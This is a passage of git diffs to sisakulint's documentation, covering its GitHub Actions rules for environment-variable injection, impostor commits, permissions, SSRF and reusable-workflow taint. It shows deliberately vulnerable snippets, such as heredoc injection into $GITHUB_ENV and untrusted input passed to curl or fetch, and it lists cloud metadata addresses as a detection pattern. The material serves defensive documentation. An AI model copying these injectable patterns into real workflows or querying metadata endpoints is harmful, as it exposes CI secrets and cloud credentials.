+A multiline-heredoc form (`KEY<<EOF`) with a fixed delimiter is exploitable when the attacker's value contains a line equal to the delimiter — the heredoc closes early and the attacker can inject arbitrary `KEY=VALUE` or `KEY<<EOF` blocks for subsequent steps. The example below is still **flagged** by this rule, because the untrusted interpolation on the second line is written to `$GITHUB_ENV`; what the rule catches is the interpolation-to-`$GITHUB_ENV` flow, **not** delimiter-forgery as such:
 
-4. **Privileged workflow triggers** where the impact is critical
+```yaml
+# Flagged: untrusted interpolation reaches $GITHUB_ENV
+run: |
+  echo "PR_BODY<<EOF" >> "$GITHUB_ENV"
+  echo "${{ github.event.pull_request.body }}" >> "$GITHUB_ENV"
+  echo "EOF" >> "$GITHUB_ENV"
+```
+
+The mitigation for the delimiter-forgery aspect is a **randomized, unguessable delimiter** (e.g. `EOF_$(uuidgen)`) so the attacker cannot predict and forge the closing line — see *Alternative: Heredoc Syntax* above for the safe form. (Because the rule detects the underlying `$GITHUB_ENV` write, both fixed- and randomized-delimiter examples remain flagged whenever they carry untrusted input — the UUID-delimiter form is a hardening measure against forgery, not a sisakulint-suppression escape.)
 
 ### Why This Pattern is Dangerous
 

--- a/content/docs/rules/envvarinjectioncritical.md
+++ b/content/docs/rules/envvarinjectioncritical.md
@@ -13,11 +13,11 @@ This rule detects environment variable injection vulnerabilities when untrusted 
 - **Privileged Context Detection**: Identifies dangerous patterns in `pull_request_target`, `workflow_run`, `issue_comment`, and other privileged triggers
 - **GITHUB_ENV Write Detection**: Analyzes scripts that write to `$GITHUB_ENV` file
 - **Auto-fix Support**: Automatically sanitizes inputs using `tr -d '\n'` to prevent newline injection
-- **Zero False Positives**: Does not flag already-safe patterns with proper sanitization
+- **Low false-positive rate**: via env-var isolation suppression (`isDefinedInEnv`) and trusted-input filtering (semantic analyzer) — already-safe patterns with proper sanitization are not flagged
 
 ### Security Impact
 
-**Severity: Critical (9/10)**
+**Severity: Critical (9/10)** — anchored to the upstream CodeQL canonical query (`actions-envvar-injection-critical`, `Security severity: 9`).
 
 Environment variable injection in privileged workflows represents a critical vulnerability in GitHub Actions:
 
@@ -27,7 +27,7 @@ Environment variable injection in privileged workflows represents a critical vul
 4. **Secret Exfiltration**: Injected variables can capture or override security-critical values
 5. **Persistence Across Steps**: Unlike in-memory code injection, environment variables persist throughout the job
 
-This vulnerability is classified as **CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')** and **CWE-20: Improper Input Validation**, and aligns with OWASP CI/CD Security Risk **CICD-SEC-04: Poisoned Pipeline Execution (PPE)**.
+This vulnerability is classified as **CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')** and **CWE-20: Improper Input Validation**, and aligns with OWASP CI/CD Security Risk **CICD-SEC-04: Poisoned Pipeline Execution (PPE)**. (These match the upstream CodeQL canonical tags `external/cwe/cwe-077` and `external/cwe/cwe-020`.)
 
 ### Privileged Workflow Triggers
 
@@ -38,6 +38,7 @@ The following triggers are considered privileged because they run with write acc
 - **`issue_comment`**: Triggered by comments from any user, including external contributors
 - **`issues`**: Triggered by issue events, potentially from untrusted sources
 - **`discussion_comment`**: Triggered by discussion comments from any user
+- **`pull_request_review`**: The reviewer body is attacker-controlled and runs in the base-repo context with secrets. In the same-repo case the privilege resolves identically to `issue_comment`; in the fork-PR case secrets are not passed and `GITHUB_TOKEN` is read-only, but the `$GITHUB_ENV` write primitive still executes and a read-only token can still exfiltrate source — so the diagnostic remains load-bearing. (Consistent with the `pull_request_review` handling documented for `code-injection-critical`.)
 
 ### Example Vulnerable Workflow
 
@@ -194,7 +195,20 @@ The rule detects:
    - `github.event.comment.body`
    - And other user-controlled fields
 
-3. **Privileged workflow triggers** where the impact is critical
+3. **Multiline heredoc (`KEY<<EOF`) injection**: writing untrusted input inside a fixed-delimiter heredoc is exploitable when the attacker's value contains the delimiter line. For example:
+
+   ```yaml
+   # VULNERABLE: attacker can embed a line equal to "EOF" to close the
+   # heredoc early and then inject arbitrary KEY=VALUE / KEY<<EOF blocks
+   run: |
+     echo "PR_BODY<<EOF" >> "$GITHUB_ENV"
+     echo "${{ github.event.pull_request.body }}" >> "$GITHUB_ENV"
+     echo "EOF" >> "$GITHUB_ENV"
+   ```
+
+   The mitigation is a **randomized, unguessable delimiter** (e.g. `EOF_$(uuidgen)`) so the attacker cannot predict and forge the closing line — see *Alternative: Heredoc Syntax* above for the safe form.
+
+4. **Privileged workflow triggers** where the impact is critical
 
 ### Why This Pattern is Dangerous
 
@@ -241,7 +255,10 @@ Enable both rules (default) to catch these patterns.
 
 ### References
 
-- [CodeQL: Environment Variable Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-envvar-injection-critical/)
+- [CodeQL: Environment Variable Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-envvar-injection-critical/) — upstream canonical query (`Security severity: 9`; tags `external/cwe/cwe-077`, `external/cwe/cwe-020`)
+- [CWE-77: Command Injection](https://cwe.mitre.org/data/definitions/77.html)
+- [CWE-20: Improper Input Validation](https://cwe.mitre.org/data/definitions/20.html)
+- [Synacktiv: GitHub Actions Exploitation — Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation)
 - [GitHub Security: Script Injection](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)
 - [OWASP: Command Injection](https://owasp.org/www-community/attacks/Command_Injection)
 - [OWASP Top 10 CI/CD Security Risks](https://owasp.org/www-project-top-10-ci-cd-security-risks/)

--- a/content/docs/rules/envvarinjectioncritical.md
+++ b/content/docs/rules/envvarinjectioncritical.md
@@ -17,7 +17,7 @@ This rule detects environment variable injection vulnerabilities when untrusted 
 
 ### Security Impact
 
-**Severity: Critical (9/10)** — anchored to the upstream CodeQL canonical query (`actions-envvar-injection-critical`, `Security severity: 9`).
+**Severity: Critical (9/10)** — referenced from CodeQL's query for this class (`actions-envvar-injection-critical`, `Security severity: 9`).
 
 Environment variable injection in privileged workflows represents a critical vulnerability in GitHub Actions:
 
@@ -27,7 +27,7 @@ Environment variable injection in privileged workflows represents a critical vul
 4. **Secret Exfiltration**: Injected variables can capture or override security-critical values
 5. **Persistence Across Steps**: Unlike in-memory code injection, environment variables persist throughout the job
 
-This vulnerability is classified as **CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')** and **CWE-20: Improper Input Validation**, and aligns with OWASP CI/CD Security Risk **CICD-SEC-04: Poisoned Pipeline Execution (PPE)**. (These match the upstream CodeQL canonical tags `external/cwe/cwe-077` and `external/cwe/cwe-020`.)
+This vulnerability is classified as **CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')** and **CWE-20: Improper Input Validation**, and aligns with OWASP CI/CD Security Risk **CICD-SEC-04: Poisoned Pipeline Execution (PPE)**. (These match CodeQL's CWE tags `external/cwe/cwe-077` and `external/cwe/cwe-020` for this query.)
 
 ### Privileged Workflow Triggers
 
@@ -256,7 +256,7 @@ Enable both rules (default) to catch these patterns.
 
 ### References
 
-- [CodeQL: Environment Variable Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-envvar-injection-critical/) — upstream canonical query (`Security severity: 9`; tags `external/cwe/cwe-077`, `external/cwe/cwe-020`)
+- [CodeQL: Environment Variable Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-envvar-injection-critical/) — CodeQL query (severity / CWE reference; `Security severity: 9`; tags `external/cwe/cwe-077`, `external/cwe/cwe-020`)
 - [CWE-77: Command Injection](https://cwe.mitre.org/data/definitions/77.html)
 - [CWE-20: Improper Input Validation](https://cwe.mitre.org/data/definitions/20.html)
 - [Synacktiv: GitHub Actions Exploitation — Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation)

--- a/content/docs/rules/envvarinjectioncritical.md
+++ b/content/docs/rules/envvarinjectioncritical.md
@@ -13,7 +13,7 @@ This rule detects environment variable injection vulnerabilities when untrusted 
 - **Privileged Context Detection**: Identifies dangerous patterns in `pull_request_target`, `workflow_run`, `issue_comment`, and other privileged triggers
 - **GITHUB_ENV Write Detection**: Analyzes scripts that write to `$GITHUB_ENV` file
 - **Auto-fix Support**: Automatically sanitizes inputs using `tr -d '\n'` to prevent newline injection
-- **Low false-positive rate**: via env-var isolation suppression (`isDefinedInEnv`) and trusted-input filtering (semantic analyzer) — already-safe patterns with proper sanitization are not flagged
+- **Low false-positive rate**: via env-var isolation suppression and trusted-input filtering — already-safe patterns with proper sanitization are not flagged
 
 ### Security Impact
 

--- a/content/docs/rules/impostorcommit.md
+++ b/content/docs/rules/impostorcommit.md
@@ -6,7 +6,9 @@ bookToc: true
 
 ### Impostor Commit Rule Overview
 
-This rule detects **impostor commits** - commits that exist in the GitHub fork network but not in any branch or tag of the specified repository. This is a **supply chain attack vector** (CVSS 9.8) where attackers create malicious commits in forks and trick users into referencing them as if they were from the original repository.
+This rule detects **impostor commits** - commits that exist in the GitHub fork network but not in any branch or tag of the specified repository. This is a **supply chain attack vector** (CVSS 9.8; sisakulint's own scoring — no upstream scanner publishes a score for this class) where attackers create malicious commits in forks and trick users into referencing them as if they were from the original repository.
+
+> **⚠️ Requires a GitHub token to operate.** This rule verifies commits via the GitHub API. Without a token it silently emits **no findings** — all verification paths fail open, even for public repositories, and no warning is printed for this rule. Set the `GITHUB_TOKEN`, `GH_TOKEN`, or `SISAKULINT_GITHUB_TOKEN` environment variable, or pass `-github-token`, before relying on a clean result. The example output below assumes a token is configured.
 
 **Vulnerable Example:**
 
@@ -26,7 +28,7 @@ jobs:
 **Detection Output:**
 
 ```bash
-vulnerable.yaml:9:9: potential impostor commit detected: the commit 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeef' is not found in any branch or tag of 'actions/checkout'. This could be a supply chain attack where an attacker created a malicious commit in a fork. Verify the commit exists in the official repository or use a known tag instead. See: https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd for more details [impostor-commit]
+vulnerable.yaml:9:9: potential impostor commit detected: the commit 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeef' is not found in any branch or tag of 'actions/checkout'. This could be a supply chain attack where an attacker created a malicious commit in a fork. Verify the commit exists in the official repository or use a known tag instead. See: https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd [impostor-commit]
       9 👈|      - uses: actions/checkout@deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
 ```
 
@@ -114,7 +116,7 @@ The rule implements a 5-stage verification pipeline. Each stage is an independen
 
 Fetches up to 500 tags (5 pages × 100) via `getTags()` and compares each tag's HEAD SHA against the target. Also records the latest semver tag for auto-fix suggestions.
 
-**Important (since PR #402):** A tag match alone no longer clears the commit as legitimate. Even if the target SHA matches a tag, the rule proceeds to verify that the commit is **reachable from the default branch** (Stage 4). This prevents fake tags — tags created by an attacker pointing to fork commits — from bypassing detection. The auto-fix logic also excludes tags whose commits are not reachable from the default branch, ensuring fake tags are never suggested as replacements.
+**Important (since PR #402):** A tag match alone no longer clears the commit as legitimate. Even if the target SHA matches a tag, the rule proceeds to verify that the commit is **reachable from the default branch** (Stage 4). This prevents fake tags — tags created by an attacker pointing to fork commits — from bypassing detection. The auto-fix logic also excludes tags that point to the target SHA itself, ensuring a suspicious tag is never suggested as the replacement for its own commit.
 
 ```go
 tags := rule.getTags(ctx, client, owner, repo)
@@ -177,9 +179,15 @@ for _, tag := range tags[:maxTagCompareCommits] {
 }
 ```
 
-*Fail-open:* If all tag comparisons fail (e.g., rate-limited), verification returns `isImpostor: false`.
+*Fail-open:* This stage distinguishes two cases: if **no comparable tag was available** (e.g., the repository has no usable tags), verification proceeds to the final verdict; if comparisons were attempted and **all of them failed** (e.g., rate-limited), verification returns `isImpostor: false`.
 
 **Final verdict:** If all 5 stages pass without confirming legitimacy, the commit is flagged as an impostor.
+
+**Operational notes:**
+
+- Each commit verification is bounded by a **30-second timeout**; on timeout the result fails open (not flagged).
+- The rule requires connectivity to `api.github.com`. In an **air-gapped or network-restricted CI**, every path fails open and the rule silently reports nothing.
+- API responses (tags, branches, comparisons) are cached **per process only** — repeated lint runs in CI re-fetch them on every invocation.
 
 ### Detection Logic Explanation
 
@@ -229,6 +237,7 @@ False positives can occur in these scenarios:
 3. **Rate limiting**
    - GitHub API rate limits may prevent verification
    - All API failure paths fail open — the rule will NOT flag a commit as impostor when the API is unavailable
+   - An authenticated token raises the GitHub API rate limit from **60 to 5,000 requests/hour**, which matters when linting workflows that reference many actions
 
 4. ~~**Non-default branch HEAD commits**~~ *(Fixed)*
    - Previously, commits at the HEAD of non-default branches (e.g., `stable`, `release/v2`) could be falsely flagged
@@ -256,6 +265,11 @@ This rule supports automatic fixing. When you run sisakulint with the `-fix on` 
 - Identifies the latest semver tag (e.g., `v4.1.1`)
 - Fetches the commit SHA for that tag
 - Replaces the action reference with the valid SHA and tag comment
+
+**Auto-fix caveats:**
+- Tag selection **prefers `v`-prefixed semver tags** but falls back to the first tag that does not point at the flagged SHA — it is not a strict semver-ordered choice, so verify the suggested version.
+- If the repository has **no usable latest tag**, the auto-fix silently makes no change (the finding is still reported).
+- If resolving the tag's commit SHA fails (API error, missing token), the auto-fix returns an error instead of rewriting the reference.
 
 **Example:**
 

--- a/content/docs/rules/knownvulnerableactions.md
+++ b/content/docs/rules/knownvulnerableactions.md
@@ -13,6 +13,8 @@ weight: 1
 
 This rule detects GitHub Actions with known security vulnerabilities using the GitHub Security Advisories database. It helps identify actions that have been reported with CVEs or other security advisories and suggests upgrading to patched versions.
 
+> **⚠️ Reliable operation requires a GitHub token.** Advisory lookups use the GitHub API (60 requests/hour unauthenticated, 5,000/hour with a token). When a lookup fails — missing token, rate limit, or network error — the rule **silently skips the check and reports no findings** for the affected actions (fail-open). A clean result under rate limiting is therefore not proof that your actions are advisory-free. sisakulint prints a startup warning when no token is detected.
+
 ### Security Impact
 
 **Severity: Varies (inherits from advisory CVSS score)**
@@ -110,7 +112,7 @@ This rule requires GitHub API access to fetch security advisories. Authenticatio
 3. `gh auth token` command (GitHub CLI)
 4. Git credential helper
 
-Without authentication, the rule may be rate-limited and skip vulnerability checks.
+Without authentication the API allows only 60 requests/hour; failed or rate-limited lookups are skipped silently with no finding emitted (see the notice at the top of this page).
 
 ### Skipped Actions
 

--- a/content/docs/rules/outputclobbering.md
+++ b/content/docs/rules/outputclobbering.md
@@ -45,16 +45,18 @@ Detects output clobbering in privileged workflow contexts:
 - `issue_comment`
 - `issues`
 - `discussion_comment`
+- `pull_request_review`
 
 These triggers have write access or access to secrets, making exploitation more severe.
 
 ### output-clobbering-medium
 
-Detects output clobbering in normal workflow contexts:
+Detects output clobbering in normal workflow contexts — **any trigger that is not one of the privileged ones above**. The triggers below are common examples, not an exhaustive list:
 - `pull_request`
 - `push`
 - `schedule`
 - `workflow_dispatch`
+- other non-privileged triggers such as `release`, `create`, `registry_package`, etc.
 
 These triggers have limited permissions but can still lead to issues like incorrect build outputs or workflow logic bypass.
 
@@ -65,6 +67,7 @@ The rule detects patterns like:
 - `echo "name=${{ untrusted }}" >> "$GITHUB_OUTPUT"`
 - `echo "name=${{ untrusted }}" >> '$GITHUB_OUTPUT'`
 - `echo "name=${{ untrusted }}" >> ${GITHUB_OUTPUT}`
+- `echo "name=${{ untrusted }}" >>$GITHUB_OUTPUT` (no space after `>>`)
 - `printf "name=${{ untrusted }}\n" >> "$GITHUB_OUTPUT"`
 
 ## Safe Patterns

--- a/content/docs/rules/permissions.md
+++ b/content/docs/rules/permissions.md
@@ -23,7 +23,9 @@ This rule enforces the principle of least privilege by validating permission set
 
 ### Security Impact
 
-**Severity: High (7/10)**
+**Severity: Warning (CodeQL canonical: `Security severity: 5.0`, `Severity: warning`, `Precision: high`)**
+
+The rule itself currently emits no in-message severity token; the canonical severity above is inherited from the upstream CodeQL query (`actions-missing-workflow-permissions`).
 
 Misconfigured permissions in GitHub Actions workflows can lead to serious security issues:
 
@@ -33,7 +35,9 @@ Misconfigured permissions in GitHub Actions workflows can lead to serious securi
 4. **Supply Chain Attacks**: Write access to packages or releases can enable supply chain compromise
 5. **Compliance Violations**: Overly permissive workflows may violate security policies
 
-This aligns with **OWASP CI/CD Security Risk CICD-SEC-02: Inadequate Identity and Access Management**.
+This aligns with **OWASP CI/CD Security Risk CICD-SEC-02: Inadequate Identity and Access Management** and **CWE-275: Permission Issues** (the canonical CWE tag from the upstream CodeQL query `actions-missing-workflow-permissions`).
+
+> Note: For organizations or repositories created before February 2023, the default `GITHUB_TOKEN` permissions are set to read-write. Newer repositories default to a more restricted scope. Explicit `permissions:` declarations are still the safest baseline regardless of repo age.
 
 ### Understanding GitHub Actions Permissions
 
@@ -46,12 +50,15 @@ Available permission scopes include:
 | Scope | Controls Access To |
 |-------|-------------------|
 | `actions` | GitHub Actions runs and artifacts |
+| `artifact-metadata` | Artifact metadata (newer scope, validated by rule) |
+| `attestations` | Build provenance attestations |
 | `checks` | Check runs and check suites |
 | `contents` | Repository contents (code, releases) |
 | `deployments` | Deployment statuses |
 | `discussions` | GitHub Discussions |
 | `id-token` | OIDC token generation |
 | `issues` | Issues and issue comments |
+| `models` | GitHub-hosted ML models |
 | `packages` | GitHub Packages |
 | `pages` | GitHub Pages |
 | `pull-requests` | Pull requests and comments |
@@ -69,12 +76,13 @@ Each scope accepts three values:
 
 #### Top-Level Permission Values
 
-At the workflow or job level, you can set blanket permissions:
+At the workflow or job level, you can set blanket permissions. Only the following three values are accepted by GitHub Actions at the top-level position:
 
 - **`read-all`**: Read access to all scopes (safer default)
 - **`write-all`**: Write access to all scopes (avoid if possible)
-- **`none`**: No permissions (most secure, but may break functionality)
-- **`{}` (empty object)**: Explicitly deny all permissions
+- **`{}` (empty object)**: Explicitly deny all permissions (use this when you want a workflow with no API access)
+
+> Note: A previous version of this documentation listed `permissions: none` as a valid top-level value. This was incorrect: the runner rejects `permissions: none` at the parse stage. To deny all permissions, use `permissions: {}`. Verified via GitHub's official documentation and live runner probes (`sisaku-security/workflow-probe:results/permissions-none.md`, 2026-05-24). The GitHub-official wording is: "You can use the following syntax to disable permissions for all of the available permissions: `permissions: {}`".
 
 ### Example Vulnerable Workflow
 
@@ -131,6 +139,8 @@ The Permissions Rule validates:
 
 4. **Missing Permissions** (in some contexts):
    - Workflows without explicit permissions may inherit overly broad defaults
+   - The missing-permissions warning is **suppressed** when the workflow is invoked via `workflow_call` (reusable workflow), since permissions are inherited from the caller (see *Reusable Workflows* below).
+   - The missing-permissions warning is also **suppressed** when the workflow-level `permissions:` block is omitted *and* every job declares its own explicit `permissions:` block — in that case, the workflow-level omission is a no-op and not reported.
 
 ### Safe Patterns
 
@@ -349,6 +359,22 @@ permissions:
   issues: read
 ```
 
+### Auto-Fix
+
+When a workflow has no top-level `permissions:` block and the missing-permissions warning is not suppressed, sisakulint can inject an empty placeholder via `-fix on`:
+
+```yaml
+permissions:
+  # TODO: Review and add required permissions. Auto-fix sets empty (no permissions) for safety.
+  {}
+```
+
+Behavior:
+
+- The injected block is `permissions: {}` (deny-all by default) accompanied by a `TODO` head comment instructing the user to review and add the minimum required scopes.
+- Insertion position is deterministic: immediately after the `on:` block, or — if no `on:` is present — after `name:` / `run-name:`, or finally at the top of the workflow file.
+- The auto-fix never overwrites an existing `permissions:` block; it only injects when one is absent and the suppression rules above do not apply.
+
 ### Detection Example
 
 Running sisakulint on a misconfigured workflow:
@@ -359,7 +385,7 @@ $ sisakulint .github/workflows/ci.yml
 .github/workflows/ci.yml:4:14: "write" is invalid for permission for all the scopes. [permissions]
      4 👈|permissions: write
 
-.github/workflows/ci.yml:11:7: unknown permission scope "check". all available permission scopes are "actions", "checks", "contents", "deployments", "discussions", "id-token", "issues", "packages", "pages", "pull-requests", "repository-projects", "security-events", "statuses" [permissions]
+.github/workflows/ci.yml:11:7: unknown permission scope "check". all available permission scopes are "actions", "artifact-metadata", "attestations", "checks", "contents", "deployments", "discussions", "id-token", "issues", "models", "packages", "pages", "pull-requests", "repository-projects", "security-events", "statuses" [permissions]
      11 👈|      check: write
 
 .github/workflows/ci.yml:13:15: The value "readable" is not a valid permission for the scope "issues". Only 'read', 'write', or 'none' are acceptable values. [permissions]
@@ -414,7 +440,7 @@ jobs:
 
 #### Reusable Workflows
 
-Permissions in reusable workflows are inherited from the caller:
+Permissions in reusable workflows are inherited from the caller. The Permissions rule **does not flag** a missing top-level `permissions:` block in workflows whose trigger is `workflow_call` (i.e. reusable workflows themselves), because the effective permissions are decided by the caller, not the callee.
 
 ```yaml
 # caller.yml
@@ -429,10 +455,12 @@ jobs:
 
 ### References
 
+- [CodeQL: `actions-missing-workflow-permissions`](https://codeql.github.com/codeql-query-help/actions/actions-missing-workflow-permissions/) — upstream canonical query (sisakulint deliberately ports this; CWE-275, `Security severity: 5.0`).
 - [GitHub Docs: Automatic Token Authentication](https://docs.github.com/en/actions/security-guides/automatic-token-authentication)
 - [GitHub Docs: Permissions for GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
 - [GitHub Security: Hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
 - [OWASP: CI/CD Security Risk CICD-SEC-02](https://owasp.org/www-project-top-10-ci-cd-security-risks/)
+- [CWE-275: Permission Issues](https://cwe.mitre.org/data/definitions/275.html)
 
 ### Testing
 

--- a/content/docs/rules/permissions.md
+++ b/content/docs/rules/permissions.md
@@ -82,7 +82,7 @@ At the workflow or job level, you can set blanket permissions. Only the followin
 - **`write-all`**: Write access to all scopes (avoid if possible)
 - **`{}` (empty object)**: Explicitly deny all permissions (use this when you want a workflow with no API access)
 
-> Note: A previous version of this documentation listed `permissions: none` as a valid top-level value. This was incorrect: the runner rejects `permissions: none` at the parse stage. To deny all permissions, use `permissions: {}`. Verified via GitHub's official documentation and live runner probes (`sisaku-security/workflow-probe:results/permissions-none.md`, 2026-05-24). The GitHub-official wording is: "You can use the following syntax to disable permissions for all of the available permissions: `permissions: {}`".
+> Note: `permissions: none` is **not** valid at the top level — the runner rejects it at the parse stage. To deny all permissions, use `permissions: {}`. (GitHub's official wording: "You can use the following syntax to disable permissions for all of the available permissions: `permissions: {}`".)
 
 ### Example Vulnerable Workflow
 

--- a/content/docs/rules/permissions.md
+++ b/content/docs/rules/permissions.md
@@ -25,7 +25,7 @@ This rule enforces the principle of least privilege by validating permission set
 
 **Severity: Warning (CodeQL canonical: `Security severity: 5.0`, `Severity: warning`, `Precision: high`)**
 
-The rule itself currently emits no in-message severity token; the canonical severity above is inherited from the upstream CodeQL query (`actions-missing-workflow-permissions`).
+The rule itself currently emits no in-message severity token; the canonical severity above is referenced from CodeQL's query for this class (`actions-missing-workflow-permissions`).
 
 Misconfigured permissions in GitHub Actions workflows can lead to serious security issues:
 
@@ -35,7 +35,7 @@ Misconfigured permissions in GitHub Actions workflows can lead to serious securi
 4. **Supply Chain Attacks**: Write access to packages or releases can enable supply chain compromise
 5. **Compliance Violations**: Overly permissive workflows may violate security policies
 
-This aligns with **OWASP CI/CD Security Risk CICD-SEC-02: Inadequate Identity and Access Management** and **CWE-275: Permission Issues** (the canonical CWE tag from the upstream CodeQL query `actions-missing-workflow-permissions`).
+This aligns with **OWASP CI/CD Security Risk CICD-SEC-02: Inadequate Identity and Access Management** and **CWE-275: Permission Issues** (the CWE tag from CodeQL's query for this class, `actions-missing-workflow-permissions`).
 
 > Note: For organizations or repositories created before February 2023, the default `GITHUB_TOKEN` permissions are set to read-write. Newer repositories default to a more restricted scope. Explicit `permissions:` declarations are still the safest baseline regardless of repo age.
 
@@ -455,7 +455,7 @@ jobs:
 
 ### References
 
-- [CodeQL: `actions-missing-workflow-permissions`](https://codeql.github.com/codeql-query-help/actions/actions-missing-workflow-permissions/) — upstream canonical query (sisakulint deliberately ports this; CWE-275, `Security severity: 5.0`).
+- [CodeQL: `actions-missing-workflow-permissions`](https://codeql.github.com/codeql-query-help/actions/actions-missing-workflow-permissions/) — CodeQL query (severity / CWE reference; CWE-275, `Security severity: 5.0`). sisakulint models this rule on the CodeQL query.
 - [GitHub Docs: Automatic Token Authentication](https://docs.github.com/en/actions/security-guides/automatic-token-authentication)
 - [GitHub Docs: Permissions for GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
 - [GitHub Security: Hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)

--- a/content/docs/rules/requestforgery.md
+++ b/content/docs/rules/requestforgery.md
@@ -11,8 +11,10 @@ The Request Forgery rule detects Server-Side Request Forgery (SSRF) vulnerabilit
 
 ## Rule Variants
 
-- **request-forgery-critical**: Detects SSRF vulnerabilities in workflows with privileged triggers (`pull_request_target`, `workflow_run`, `issue_comment`)
-- **request-forgery-medium**: Detects SSRF vulnerabilities in workflows with normal triggers (`pull_request`, `push`, `schedule`)
+- **request-forgery-critical**: Detects SSRF vulnerabilities in workflows with privileged triggers (`pull_request_target`, `workflow_run`, `issue_comment`, `issues`, `discussion_comment`)
+- **request-forgery-medium**: Detects SSRF vulnerabilities in workflows with normal triggers (`pull_request`, `push`, `schedule`, `pull_request_review`, etc.)
+
+`pull_request_review` carries attacker-controlled input (the review body), but this rule intentionally classifies it as medium rather than critical: the workflow runs on the pull request merge ref, and runs triggered from forked pull requests receive a read-only `GITHUB_TOKEN` and no secrets.
 
 ## What It Detects
 
@@ -38,8 +40,9 @@ The rule detects when untrusted user input is used in network request commands:
 Direct references to cloud metadata service URLs are flagged:
 
 - `169.254.169.254` - AWS/GCP/Azure metadata
-- `metadata.google.internal` - GCP metadata
+- `metadata.google` - GCP metadata (substring match, so `metadata.google.internal` and similar forms are covered)
 - `169.254.170.2` - AWS ECS metadata
+- `fd00:ec2::254` - AWS metadata (IPv6; the bracketed URL form `[fd00:ec2::254]` is also matched)
 - `100.100.100.200` - Alibaba Cloud metadata
 - `192.0.0.192` - Oracle Cloud metadata
 
@@ -136,6 +139,8 @@ Direct references to cloud metadata service URLs are flagged:
     curl "$INPUT_URL"
 ```
 
+Note: The cloud-metadata check matches the addresses listed above as plain substrings anywhere in a script. Lines that merely *list* metadata addresses in order to block them (like the `BLOCKED` variable in this pattern) are currently also flagged. This is a known limitation of the current detection and is under discussion.
+
 ## Auto-Fix
 
 The rule provides auto-fix that moves untrusted expressions to environment variables:
@@ -154,6 +159,26 @@ The rule provides auto-fix that moves untrusted expressions to environment varia
     ISSUE_BODY: ${{ github.event.issue.body }}
   run: |
     curl "$ISSUE_BODY"
+```
+
+For `actions/github-script` steps, the auto-fix moves the expression to an environment variable and rewrites the script to read it via `process.env`:
+
+**Before:**
+```yaml
+- uses: actions/github-script@v6
+  with:
+    script: |
+      const response = await fetch('${{ github.event.issue.body }}');
+```
+
+**After:**
+```yaml
+- uses: actions/github-script@v6
+  with:
+    script: |
+      const response = await fetch(process.env.ISSUE_BODY);
+  env:
+    ISSUE_BODY: ${{ github.event.issue.body }}
 ```
 
 Note: The auto-fix moves the expression to an environment variable, which prevents shell injection. However, additional validation (URL allowlist, IP blocking) is still recommended to fully mitigate SSRF risks.

--- a/content/docs/rules/reusableworkflowtaint.md
+++ b/content/docs/rules/reusableworkflowtaint.md
@@ -122,21 +122,30 @@ jobs:
 
 ### Example Output
 
-Running sisakulint will detect both the tainted input passing and unsafe usage:
+The exact message depends on whether the caller and callee are both resolvable in the run. Running over the whole repository (or passing both files) lets the caller and its local callee be joined:
 
-**Caller workflow detection:**
+**Caller and callee joined (whole repo):**
+```bash
+$ sisakulint
+
+.github/workflows/caller.yml:10:20: reusable-workflow-taint-chain (critical): untrusted source [github.event.pull_request.title] flows from caller .github/workflows/caller.yml `with: pr_title` to callee .github/workflows/pr-processor.yml run sink at line:24. [reusable-workflow-taint]
+```
+
+**Caller only (callee is remote or not present in this repo):**
 ```bash
 $ sisakulint .github/workflows/caller.yml
 
 .github/workflows/caller.yml:10:20: reusable workflow input taint (critical): input "pr_title" receives untrusted value "github.event.pull_request.title" which may be used unsafely in the called workflow "./.github/workflows/pr-processor.yml". Consider validating or sanitizing the input. [reusable-workflow-taint]
 ```
 
-**Callee workflow detection:**
+**Callee only (no caller in this repo passes untrusted input):**
 ```bash
 $ sisakulint .github/workflows/pr-processor.yml
 
-.github/workflows/pr-processor.yml:24:20: tainted input in reusable workflow: "inputs.pr_title" may contain untrusted data passed from the caller workflow. Avoid using it directly in inline scripts. Instead, pass it through an environment variable. [reusable-workflow-taint]
+.github/workflows/pr-processor.yml:24:20: reusable-workflow-taint (medium): callee uses ${{ inputs.pr_title }} in run sink, but no caller in this repo passes untrusted data. If this workflow is called from outside the repo, future callers passing untrusted input will become injection vectors. [reusable-workflow-taint]
 ```
+
+> The legacy message `tainted input in reusable workflow: ...` is a fallback used only when there is no project context (no `.git`/`.github/workflows` to correlate files). Normal CLI runs always have a project, so you will see the messages above instead.
 
 ### Auto-fix Support
 
@@ -278,6 +287,8 @@ The following sources are considered untrusted when passed to reusable workflows
 - `github.event.review.body`
 - `github.event.review_comment.body`
 
+> These are representative examples. The actual untrusted/trusted determination uses the same expression analysis shared with the code-injection rules, not a fixed list.
+
 **Other:**
 - `github.head_ref`
 - `github.event.discussion.title`
@@ -330,8 +341,12 @@ The following sources are considered untrusted when passed to reusable workflows
 | `pull_request_target` | Critical | Write access + secrets |
 | `workflow_run` | Critical | Elevated privileges |
 | `issue_comment` | Critical | Secrets access |
+| `issues` | Critical | Privileged trigger, external users |
+| `discussion_comment` | Critical | Privileged trigger, untrusted comments |
+| `pull_request_review` | Critical | Privileged trigger, runs against base repo |
 | `pull_request` | Medium | Read-only, limited scope |
 | `push` | Medium | Only trusted commits |
